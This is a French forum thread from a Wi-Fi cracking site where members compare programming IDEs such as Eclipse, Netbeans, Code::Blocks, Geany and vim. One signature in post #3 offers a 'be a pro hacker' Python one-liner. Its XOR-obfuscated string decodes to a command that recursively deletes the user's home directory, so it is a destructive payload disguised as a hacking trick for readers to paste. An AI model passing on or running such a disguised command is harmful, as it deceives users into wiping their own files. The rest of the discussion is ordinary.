Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-10-2012 06:12:02

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Comment choisir son IDE ?

Bonjour wink

Quel IDE qui soit à la fois simple et complet, la liste est longue mais je me suis fixé sur Eclipse et Netbeans, alors lequel est bien adapté pour faire du C, Ruby, Python, Java, JavaScript, HTML voir plus.
Les deux sont open source et Eclipse concentre une grande communauté de développement autour de lui, il est plutôt orienté JAVA mais on peut y installer des plugins afin de travailler d'autres langages, mais lorsque on essaie de choisir on bute sur une liste dont on ne sait lequel prendre --> Eclipse download.

En revanche, Netbeans concentre aussi une grande communauté autour et semble être plus simple d'emploi selon certaines discussions sur le net, beaucoup le préfère à Eclipse et il est dit qu'il peut supporter n'importe quel langage de programmation, en terme de choix il est plus clair mais lequel ? --> Netbeans download.

Alors, Eclipse ou Netbeans ? quel IDE avez-vous ?

PS: Il semble aussi qu'il y a des IDE en ligne comme Ideone.com

Dernière modification par Fuji (20-10-2012 06:23:11)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 20-10-2012 10:28:34

antares145
Membre d'honneur
Site Web

Re : Comment choisir son IDE ?

Arduino IDE, ça compte ? big_smile

Je suis beaucoup trop mauvais en programmation pour utiliser un IDE régulièrement, mais j'ai entendu dire beaucoup de bien de Eclipse. Son principal défaut est qu'il est plutôt lourd et lent (Java inside...), une solution intéressante est de l'exécuter depuis un RAMdisk : les accès sont beaucoup plus rapides que le disque dur, mais gare au reboot non-prévu (ram volatile, tout ça...). Je ne connais pas Netbeans, mais s'il a le même problème il doit sans doute avoir la même solution wink

#3 20-10-2012 15:40:26

spawn
Modérateur

CodeBlocks quand on est coincé sous windows.

Mais sous linux, j'utilise vim. vim ftw.

:wq

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 24-10-2012 14:56:53

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Arduino IDE: très intéressant celui-là, merci smile c'est ce que je faisais allusion l'autre jour à Koala pour l’émetteur.

J'en ai plusieurs IDE (Visual C#, Dev-C++, IDLE Python GUI, FXRI Ruby) et j'aurais aimé les fondre en un seul, mais puisque cela en consomme plus de ressource système, je vais en rester là. Mais je vais changer mon Dev-C++ en Code::Blocks je pense, vu que j'aime bien le C wink

#5 24-05-2013 18:06:39

Moh Hackz
Nouveau membre

Moi je te conseille Code::Block si t'es sous windows ce le meilleur pour le reste aucune idee!!

#6 26-05-2013 19:43:02

Sulpice92
Membre Hyperactif

Salut,

J'ai essayé plusieurs IDE et j'en ai trouvé un qui est vraiment parfait, rien qu'au niveau de la coloration c'est top.
Il s'agit de Geany.
Perso, c'est surtout pour du développement web que je m'en sers. Après pour le Java j'ai installé Netbeans..
En fait je cherchais quelque chose de léger, comme Notepad++ sous Windows. Donc il fait très bien l'affaire.
Essayez le wink

#7 28-05-2013 22:24:43

Lulu
Membre d'honneur
Lieu : Dans le noooord !

Salut,

Dans mon quotidien j'utilise Eclipse que je trouve assez sympa et simple d'utilisation. Il existe tout un tas de pluggins correspondants à mes besoins. je développe en Java / Javascript la plupart du temps.

J'ai utilisé Netbeans quand j'etais etudiante et j'ai préféré Eclipse. A l'epoque (je ne sais pas si c'est toujours le cas) Netbeans ne fonctionnait que sous linux tandis qu'Eclipse est portable aussi sous windows

M1ck3y addict

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.032 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]